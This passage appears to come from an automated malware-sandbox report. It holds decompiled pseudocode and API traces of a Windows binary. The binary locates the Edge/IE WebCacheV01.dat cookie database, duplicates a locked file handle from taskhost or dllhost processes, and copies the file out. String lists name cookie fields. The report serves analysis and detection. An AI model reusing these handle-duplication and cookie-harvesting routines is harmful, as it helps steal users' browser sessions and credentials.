                                                                                                                                                      						free(_v20);
                                                                                                                                                      					}
                                                                                                                                                      					goto L30;
                                                                                                                                                      				}
                                                                                                                                                      			}

                                                                                                                                                      0x00403dac
                                                                                                                                                      0x00403daf
                                                                                                                                                      0x00403db4
                                                                                                                                                      0x00403dd0
                                                                                                                                                      0x00403dd6
                                                                                                                                                      0x00403db6
                                                                                                                                                      0x00403dc2
                                                                                                                                                      0x00403dc8
                                                                                                                                                      0x00403dc8
                                                                                                                                                      0x00403de8
                                                                                                                                                      0x00403dee
                                                                                                                                                      0x00403dee
                                                                                                                                                      0x00403c9f
                                                                                                                                                      0x00403dfb
                                                                                                                                                      0x00403e06
                                                                                                                                                      0x00403e0b
                                                                                                                                                      0x00403e10
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403e06

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004048DA: _wcsicmp.MSVCRT ref: 0040490F
                                                                                                                                                        • Part of subcall function 00404BE4: memset.MSVCRT ref: 00404CE0
                                                                                                                                                      • free.MSVCRT(?,?,?,?,?,?), ref: 00403E0B
                                                                                                                                                        • Part of subcall function 004039C1: _wcsicmp.MSVCRT ref: 004039DA
                                                                                                                                                      • memset.MSVCRT ref: 00403CCA
                                                                                                                                                        • Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
                                                                                                                                                        • Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC
                                                                                                                                                      • memcpy.MSVCRT ref: 00403D7C
                                                                                                                                                      • memcpy.MSVCRT ref: 00403D97
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$_wcsicmpmemset$freewcslen
                                                                                                                                                      • String ID: $EntryId$Expires$Flags$LastModified$Name$Path$RDomain$Value
                                                                                                                                                      • API String ID: 4182952938-1692241855
                                                                                                                                                      • Opcode ID: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
                                                                                                                                                      • Instruction ID: d25acf1ba17ca876296ee2e242e904372f251ddc37699a211d4a96aadb20766e
                                                                                                                                                      • Opcode Fuzzy Hash: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
                                                                                                                                                      • Instruction Fuzzy Hash: D071E9B1D002199BCF20EFA5D881ADEBBB8BF04305F54447BE505BB281DB789A458F58
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                      			E004039F6(void* __eax) {
                                                                                                                                                      				int _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				char _v52;
                                                                                                                                                      				void _v578;
                                                                                                                                                      				int _v580;
                                                                                                                                                      				void _v1106;
                                                                                                                                                      				long _v1108;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr _t44;
                                                                                                                                                      				signed short _t48;
                                                                                                                                                      				int _t55;
                                                                                                                                                      				void* _t60;
                                                                                                                                                      				signed int _t63;
                                                                                                                                                      				void* _t77;
                                                                                                                                                      				void* _t94;
                                                                                                                                                      				signed short* _t100;
                                                                                                                                                      				void* _t102;
                                                                                                                                                      
                                                                                                                                                      				_t102 = __eax;
                                                                                                                                                      				_t44 =  *((intOrPtr*)(__eax + 0x63c));
                                                                                                                                                      				_t100 = __eax + 0x430;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				 *_t100 = 0;
                                                                                                                                                      				if(_t44 != 1) {
                                                                                                                                                      					__eflags = _t44 - 2;
                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                      						_t48 = E00403FDE(__eax + 4, __eflags, __eax + 0x640);
                                                                                                                                                      						__eflags = _t48;
                                                                                                                                                      						if(_t48 == 0) {
                                                                                                                                                      							_v8 =  *((intOrPtr*)(_t102 + 0x418));
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					L15:
                                                                                                                                                      					return _v8;
                                                                                                                                                      				}
                                                                                                                                                      				_v580 = 0;
                                                                                                                                                      				memset( &_v578, 0, 0x208);
                                                                                                                                                      				_v1108 = _v1108 & 0x00000000;
                                                                                                                                                      				memset( &_v1106, 0, 0x208);
                                                                                                                                                      				E0040DACC( &_v1108, 0); // executed
                                                                                                                                                      				_t55 = wcslen(L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
                                                                                                                                                      				_t12 = wcslen( &_v1108) + 1; // 0x1
                                                                                                                                                      				if(_t55 + _t12 >= 0x104) {
                                                                                                                                                      					_t15 =  &_v580;
                                                                                                                                                      					 *_t15 = _v580 & 0x00000000;
                                                                                                                                                      					__eflags =  *_t15;
                                                                                                                                                      				} else {
                                                                                                                                                      					E00405930( &_v580,  &_v1108, L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
                                                                                                                                                      				}
                                                                                                                                                      				_t60 = E004057D1( &_v580);
                                                                                                                                                      				_t109 = _t60;
                                                                                                                                                      				_pop(_t94);
                                                                                                                                                      				if(_t60 == 0) {
                                                                                                                                                      					_v8 = 0xfffffffd;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t90 = _t102 + 4;
                                                                                                                                                      					_t63 = E00403FDE(_t102 + 4, _t109,  &_v580);
                                                                                                                                                      					_t110 = _t63;
                                                                                                                                                      					if(_t63 == 0) {
                                                                                                                                                      						_v20 = _v20 & _t63;
                                                                                                                                                      						_v16 = _v16 & _t63;
                                                                                                                                                      						_v12 = 0x1388;
                                                                                                                                                      						E00406264(E0040621C( &_v52), _t94, L"dllhost.exe");
                                                                                                                                                      						E00406264( &_v52, _t94, L"taskhost.exe");
                                                                                                                                                      						E00406264( &_v52, _t94, L"taskhostex.exe");
                                                                                                                                                      						E00406264( &_v52, _t94, L"taskhostw.exe");
                                                                                                                                                      						E0040567E(_t100, L"ecv"); // executed
                                                                                                                                                      						_t77 = E0040C5E9(_t110,  &_v20,  &_v52,  &_v580, _t100); // executed
                                                                                                                                                      						_t111 = _t77;
                                                                                                                                                      						_push(_t100);
                                                                                                                                                      						if(_t77 == 0) {
                                                                                                                                                      							_v8 = 0xfffffffe;
                                                                                                                                                      							DeleteFileW(??);
                                                                                                                                                      							 *_t100 =  *_t100 & 0x00000000;
                                                                                                                                                      							__eflags =  *_t100;
                                                                                                                                                      						} else {
                                                                                                                                                      							if(E00403FDE(_t90, _t111) == 0) {
                                                                                                                                                      								_v8 =  *((intOrPtr*)(_t102 + 0x418));
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						E0040623E( &_v52);
                                                                                                                                                      						E00406710( &_v20);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}
























                                                                                                                                                      0x00403b0d
                                                                                                                                                      0x00403b1a
                                                                                                                                                      0x00403b24
                                                                                                                                                      0x00403b3a
                                                                                                                                                      0x00403b3f
                                                                                                                                                      0x00403b41
                                                                                                                                                      0x00403b42
                                                                                                                                                      0x00403b5a
                                                                                                                                                      0x00403b61
                                                                                                                                                      0x00403b67
                                                                                                                                                      0x00403b67
                                                                                                                                                      0x00403b44
                                                                                                                                                      0x00403b4d
                                                                                                                                                      0x00403b55
                                                                                                                                                      0x00403b55
                                                                                                                                                      0x00403b4d
                                                                                                                                                      0x00403b6e
                                                                                                                                                      0x00403b76
                                                                                                                                                      0x00403b76
                                                                                                                                                      0x00403ad3

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00403A36
                                                                                                                                                      • memset.MSVCRT ref: 00403A50
                                                                                                                                                        • Part of subcall function 0040DACC: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF
                                                                                                                                                      • wcslen.MSVCRT ref: 00403A68
                                                                                                                                                      • wcslen.MSVCRT ref: 00403A77
                                                                                                                                                        • Part of subcall function 00405930: wcscpy.MSVCRT ref: 00405938
                                                                                                                                                        • Part of subcall function 00405930: wcscat.MSVCRT ref: 00405947
                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,taskhostw.exe,taskhostex.exe,taskhost.exe,dllhost.exe,00000000), ref: 00403B61
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memsetwcslen$DeleteFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$dllhost.exe$ecv$taskhost.exe$taskhostex.exe$taskhostw.exe
                                                                                                                                                      • API String ID: 2175868439-3212516833
                                                                                                                                                      • Opcode ID: 24fc45b670e89c90fc9f8dccd731adadcc036b3d9691952aae2eeb5ea30e9faf
                                                                                                                                                      • Instruction ID: a022d5ce61393d47798dcb13383e44886591ba6ad6dcc354a4b6cd20eba80d87
                                                                                                                                                      • Opcode Fuzzy Hash: 24fc45b670e89c90fc9f8dccd731adadcc036b3d9691952aae2eeb5ea30e9faf
                                                                                                                                                      • Instruction Fuzzy Hash: 4B41677291061996DB10EFA5DC85ADE73BCEF04319F10457FE505F21C2EB38AB488B59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 32%
                                                                                                                                                      			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                      				struct HINSTANCE__* _t35;
                                                                                                                                                      				intOrPtr* _t37;
                                                                                                                                                      				intOrPtr* _t38;
                                                                                                                                                      				void* _t41;
                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                      				intOrPtr _t47;
                                                                                                                                                      				signed int _t49;
                                                                                                                                                      				signed int _t51;
                                                                                                                                                      				int _t53;
                                                                                                                                                      				int _t54;
                                                                                                                                                      				signed int _t56;
                                                                                                                                                      				signed int _t57;
                                                                                                                                                      				signed int _t58;
                                                                                                                                                      				int _t61;
                                                                                                                                                      				intOrPtr _t63;
                                                                                                                                                      				intOrPtr _t64;
                                                                                                                                                      				intOrPtr* _t66;
                                                                                                                                                      				void* _t67;
                                                                                                                                                      				signed int _t71;
                                                                                                                                                      				int _t72;
                                                                                                                                                      				void* _t73;
                                                                                                                                                      				intOrPtr _t81;
                                                                                                                                                      
                                                                                                                                                      				_t67 = __edx;
                                                                                                                                                      				_push(0x70);
                                                                                                                                                      				_push(0x40f3f0);
                                                                                                                                                      				E0040E2B8(__ebx, __edi, __esi);
                                                                                                                                                      				_t35 = GetModuleHandleA(0);
                                                                                                                                                      				if(_t35->i != 0x5a4d) {
                                                                                                                                                      					L4:
                                                                                                                                                      					 *(_t73 - 0x1c) = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t66 =  *((intOrPtr*)(_t35 + 0x3c)) + _t35;
                                                                                                                                                      					if( *_t66 != 0x4550) {
                                                                                                                                                      						goto L4;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t57 =  *(_t66 + 0x18) & 0x0000ffff;
                                                                                                                                                      						if(_t57 == 0x10b) {
                                                                                                                                                      							__eflags =  *((intOrPtr*)(_t66 + 0x74)) - 0xe;
                                                                                                                                                      							if( *((intOrPtr*)(_t66 + 0x74)) <= 0xe) {
                                                                                                                                                      								goto L4;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t58 = 0;
                                                                                                                                                      								__eflags =  *(_t66 + 0xe8);
                                                                                                                                                      								goto L9;
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							if(_t57 == 0x20b) {
                                                                                                                                                      								__eflags =  *((intOrPtr*)(_t66 + 0x84)) - 0xe;
                                                                                                                                                      								if( *((intOrPtr*)(_t66 + 0x84)) <= 0xe) {
                                                                                                                                                      									goto L4;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t58 = 0;
                                                                                                                                                      									__eflags =  *(_t66 + 0xf8);
                                                                                                                                                      									L9:
                                                                                                                                                      									_t9 = __eflags != 0;
                                                                                                                                                      									__eflags = _t9;
                                                                                                                                                      									 *(_t73 - 0x1c) = _t58 & 0xffffff00 | _t9;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								goto L4;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t73 - 4) = 0;
                                                                                                                                                      				_t61 = 2;
                                                                                                                                                      				__set_app_type(_t61);
                                                                                                                                                      				 *0x413700 =  *0x413700 | 0xffffffff;
                                                                                                                                                      				 *0x413704 =  *0x413704 | 0xffffffff;
                                                                                                                                                      				_t37 = __p__fmode();
                                                                                                                                                      				_t63 =  *0x41238c; // 0x0
                                                                                                                                                      				 *_t37 = _t63;
                                                                                                                                                      				_t38 = __p__commode();
                                                                                                                                                      				_t64 =  *0x412388; // 0x0
                                                                                                                                                      				 *_t38 = _t64;
                                                                                                                                                      				 *0x4136fc =  *_adjust_fdiv;
                                                                                                                                                      				_t41 = E0040E2B2();
                                                                                                                                                      				_t81 =  *0x412000; // 0x1
                                                                                                                                                      				if(_t81 == 0) {
                                                                                                                                                      					__setusermatherr(E0040E2B2);
                                                                                                                                                      					_pop(_t64);
                                                                                                                                                      				}
                                                                                                                                                      				E0040E2A0(_t41);
                                                                                                                                                      				L0040E29A();
                                                                                                                                                      				_t43 =  *0x412384; // 0x0
                                                                                                                                                      				 *((intOrPtr*)(_t73 - 0x20)) = _t43;
                                                                                                                                                      				_t47 = _t73 - 0x2c;
                                                                                                                                                      				__imp____wgetmainargs(_t47, _t73 - 0x28, _t73 - 0x24,  *0x412380, _t73 - 0x20, 0x40f3c0, 0x40f3c4); // executed
                                                                                                                                                      				 *((intOrPtr*)(_t73 - 0x30)) = _t47;
                                                                                                                                                      				_push(0x40f3bc);
                                                                                                                                                      				_push(0x40f394); // executed
                                                                                                                                                      				L0040E29A(); // executed
                                                                                                                                                      				_t71 =  *__imp___wcmdln;
                                                                                                                                                      				if(_t71 != 0) {
                                                                                                                                                      					 *(_t73 - 0x34) = _t71;
                                                                                                                                                      					__eflags =  *_t71 - 0x22;
                                                                                                                                                      					if( *_t71 != 0x22) {
                                                                                                                                                      						while(1) {
                                                                                                                                                      							__eflags =  *_t71 - 0x20;
                                                                                                                                                      							if( *_t71 <= 0x20) {
                                                                                                                                                      								goto L19;
                                                                                                                                                      							}
                                                                                                                                                      							_t71 = _t71 + _t61;
                                                                                                                                                      							 *(_t73 - 0x34) = _t71;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						while(1) {
                                                                                                                                                      							_t71 = _t71 + _t61;
                                                                                                                                                      							 *(_t73 - 0x34) = _t71;
                                                                                                                                                      							_t56 =  *_t71;
                                                                                                                                                      							__eflags = _t56;
                                                                                                                                                      							if(_t56 == 0) {
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _t56 - 0x22;
                                                                                                                                                      							if(_t56 != 0x22) {
                                                                                                                                                      								continue;
                                                                                                                                                      							}
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags =  *_t71 - 0x22;
                                                                                                                                                      						if( *_t71 == 0x22) {
                                                                                                                                                      							L18:
                                                                                                                                                      							_t71 = _t71 + _t61;
                                                                                                                                                      							__eflags = _t71;
                                                                                                                                                      							 *(_t73 - 0x34) = _t71;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					L19:
                                                                                                                                                      					_t49 =  *_t71;
                                                                                                                                                      					__eflags = _t49;
                                                                                                                                                      					if(_t49 != 0) {
                                                                                                                                                      						__eflags = _t49 - 0x20;
                                                                                                                                                      						if(_t49 <= 0x20) {
                                                                                                                                                      							goto L18;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					 *(_t73 - 0x4c) = 0;
                                                                                                                                                      					GetStartupInfoW(_t73 - 0x78);
                                                                                                                                                      					__eflags =  *(_t73 - 0x4c) & 0x00000001;
                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                      						_t51 = 0xa;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t51 =  *(_t73 - 0x48) & 0x0000ffff;
                                                                                                                                                      					}
                                                                                                                                                      					_t53 = E0040BE98(_t64, _t67, __eflags, GetModuleHandleA(0), 0, _t71, _t51); // executed
                                                                                                                                                      					_t72 = _t53;
                                                                                                                                                      					 *(_t73 - 0x7c) = _t72;
                                                                                                                                                      					__eflags =  *(_t73 - 0x1c);
                                                                                                                                                      					if( *(_t73 - 0x1c) == 0) {
                                                                                                                                                      						exit(_t72); // executed
                                                                                                                                                      					}
                                                                                                                                                      					__imp___cexit();
                                                                                                                                                      					_t32 = _t73 - 4;
                                                                                                                                                      					 *_t32 =  *(_t73 - 4) | 0xffffffff;
                                                                                                                                                      					__eflags =  *_t32;
                                                                                                                                                      					_t54 = _t72;
                                                                                                                                                      				} else {
                                                                                                                                                      					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
                                                                                                                                                      					_t54 = 0xff;
                                                                                                                                                      				}
                                                                                                                                                      				return E0040E2F1(_t54);
                                                                                                                                                      			}


























                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2827331108-0
                                                                                                                                                      • Opcode ID: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
                                                                                                                                                      • Instruction ID: c002ea54ac36ed1473f3b1447c0311433b5c4b2607527e15f7219f70d0093426
                                                                                                                                                      • Opcode Fuzzy Hash: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
                                                                                                                                                      • Instruction Fuzzy Hash: C251A071C40215DBCB34AFA6D9489AD7BB4EB04310F20897FE821BB2E1D7794D96DB48
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040C5E9(void* __eflags, void* _a4, long _a8, void* _a12, long _a16) {
                                                                                                                                                      				struct _OVERLAPPED* _v8;
                                                                                                                                                      				struct _OVERLAPPED* _v12;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				struct _OVERLAPPED* _v20;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				void* _t41;
                                                                                                                                                      				void* _t49;
                                                                                                                                                      				void* _t52;
                                                                                                                                                      				int _t55;
                                                                                                                                                      				int _t57;
                                                                                                                                                      				void* _t67;
                                                                                                                                                      
                                                                                                                                                      				_t57 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_t38 = E0040C6FB(_a4, __eflags, _a8, _a12,  &_v8,  &_v12); // executed
                                                                                                                                                      				if(_t38 != 0) {
                                                                                                                                                      					_v24 = 0;
                                                                                                                                                      					_v20 = 0;
                                                                                                                                                      					_v16 = 0x1388;
                                                                                                                                                      					E00406729(0x8000,  &_v24);
                                                                                                                                                      					_t41 = OpenProcess(0x40, 0, _v8);
                                                                                                                                                      					_v8 = _t41;
                                                                                                                                                      					if(_t41 != 0) {
                                                                                                                                                      						_a12 = 0;
                                                                                                                                                      						DuplicateHandle(_v8, _v12, GetCurrentProcess(),  &_a12, 0x80000000, 0, 0); // executed
                                                                                                                                                      						if(_a12 != 0) {
                                                                                                                                                      							_a8 = GetFileSize(_a12, 0);
                                                                                                                                                      							_a4 = E00405351(_a16);
                                                                                                                                                      							_t49 = CreateFileMappingW(_a12, 0, 2, 0, 0, 0); // executed
                                                                                                                                                      							_v12 = _t49;
                                                                                                                                                      							if(_t49 != 0) {
                                                                                                                                                      								_t52 = MapViewOfFile(_t49, 4, 0, 0, _a8); // executed
                                                                                                                                                      								_t67 = _t52;
                                                                                                                                                      								if(_t67 != 0) {
                                                                                                                                                      									_a16 = 0;
                                                                                                                                                      									_t55 = WriteFile(_a4, _t67, _a8,  &_a16, 0); // executed
                                                                                                                                                      									_t57 = _t55;
                                                                                                                                                      									UnmapViewOfFile(_t67);
                                                                                                                                                      								}
                                                                                                                                                      								FindCloseChangeNotification(_v12); // executed
                                                                                                                                                      							}
                                                                                                                                                      							CloseHandle(_a4);
                                                                                                                                                      							CloseHandle(_a12);
                                                                                                                                                      						}
                                                                                                                                                      						CloseHandle(_v8);
                                                                                                                                                      					}
                                                                                                                                                      					E00406710( &_v24);
                                                                                                                                                      				}
                                                                                                                                                      				return _t57;
                                                                                                                                                      			}


















                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040C6FB: memset.MSVCRT ref: 0040C725
                                                                                                                                                        • Part of subcall function 0040C6FB: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
                                                                                                                                                        • Part of subcall function 0040C6FB: FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
                                                                                                                                                        • Part of subcall function 0040C6FB: GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
                                                                                                                                                        • Part of subcall function 0040C6FB: _wcsicmp.MSVCRT ref: 0040C816
                                                                                                                                                        • Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
                                                                                                                                                        • Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E
                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C638
                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C657
                                                                                                                                                      • DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C664
                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C679
                                                                                                                                                        • Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363
                                                                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C697
                                                                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00001388,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6AC
                                                                                                                                                      • WriteFile.KERNELBASE(?,00000000,00001388,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6C7
                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D0
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D9
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6DE
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E3
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationView$??2@??3@DuplicateMappingOpenSizeUnmapWrite_wcsicmpmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3028965261-0
                                                                                                                                                      • Opcode ID: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
                                                                                                                                                      • Instruction ID: e6db179c7e43cd6fbe3270d478d1169048f03751868c197fc0ca6440827a8631
                                                                                                                                                      • Opcode Fuzzy Hash: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
                                                                                                                                                      • Instruction Fuzzy Hash: DD31F5B5800209FFDB11AFA5DD889AE7BB9FB08344F10443AF905B6260D7758E54DB64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                      			E0040DACC(wchar_t* __ebx, void* __ecx) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				char _v72;
                                                                                                                                                      				void _v590;
                                                                                                                                                      				long _v592;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      				void* _t27;
                                                                                                                                                      				intOrPtr _t38;
                                                                                                                                                      
                                                                                                                                                      				_t27 = __ecx;
                                                                                                                                                      				_t26 = __ebx;
                                                                                                                                                      				E0040DA9D();
                                                                                                                                                      				_t38 =  *0x413264; // 0x74a43bb0
                                                                                                                                                      				if(_t38 == 0) {
                                                                                                                                                      					_v592 = 0;
                                                                                                                                                      					memset( &_v590, 0, 0x206);
                                                                                                                                                      					_t3 =  &_v8; // 0x403a63
                                                                                                                                                      					if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", 0, 0x20019, _t3) == 0) {
                                                                                                                                                      						_t5 =  &_v8; // 0x403a63
                                                                                                                                                      						E0040D6BF(0x104, _t27,  &_v592,  *_t5,  &_v72);
                                                                                                                                                      						RegCloseKey(_v8);
                                                                                                                                                      					}
                                                                                                                                                      					wcscpy(_t26,  &_v592);
                                                                                                                                                      					return 0 |  *_t26 != 0x00000000;
                                                                                                                                                      				}
                                                                                                                                                      				E004058FB();
                                                                                                                                                      				_t25 =  *0x413264(0, __ebx, 0x1c, 0); // executed
                                                                                                                                                      				return _t25;
                                                                                                                                                      			}












                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040DA9D: LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
                                                                                                                                                        • Part of subcall function 0040DA9D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF
                                                                                                                                                      • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,c:@,?,?,?), ref: 0040DB27
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0040DB4E
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DB5D
                                                                                                                                                        • Part of subcall function 004058FB: GetVersionExW.KERNEL32(00412B18,?,0040DAEA,?), ref: 00405915
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
